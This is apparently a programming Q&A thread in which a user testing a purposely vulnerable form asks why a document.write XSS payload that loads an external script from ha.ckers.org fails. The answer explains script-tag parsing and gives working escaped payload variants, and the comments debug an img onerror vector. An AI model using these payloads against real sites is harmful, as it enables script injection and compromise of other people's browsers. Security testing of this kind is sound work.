
How do I load an external .js script using this syntax?

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>.

For all those wondering, I set up a test form that I made purposely vulnerable, but I couldn't get this to launch, and yes, I know:

<script src=//ha.ckers.org/xss.js></script>

could easily work, but I'm just trying to figure out how I could do it using document.write.

Thanks to anyone who is able to help me.

Edit: Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\/script>')>

  • You have to escape the </script> tag: <\/script>. Otherwise the compiler will end the JS with that tag and not with the right one. Commented Jul 3, 2013 at 22:16

1 Answer


What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script>, and then hand that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers.org/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>

8 Comments

Hmm, strange, it only works with <script> tags. I was wondering, when the XSS is <img src=x onerror=document.write('<script src="ha.ckers.org/xss.js"><\/script>')> it doesn't work. Why?
@user2536979: I'm not quite sure what you mean by "doesn't work," but remember that the text of HTML attributes is HTML. And if you don't enclose the value of an attribute in quotes, the attribute value ends at the first space (in your case, after <script).
You have to wrap the inline code, added with HTML tags events, inside the quotes. You will need to escape the string in the right way, or it won't work! (But I'm not sure it would work anyway)
@T.J.Crowder The XSS works when I have it surrounded by <script> tags; however, when I use the vector <img src=x onerror=javascriptcodegoeshere> it doesn't work. "<img src=x onerror=document.write('<script src=ha.ckers.org/xss.js></script>')>" doesn't work, but "<script>document.write('<script src=ha.ckers.org/xss.js><\/script>')</script>" works.
@user2536979: See above. If you ensure the attribute is properly encoded, the script will run. You probably don't want document.write, though, as it completely replaces the page at the point onerror would load it. But fundamentally: Why all these games?
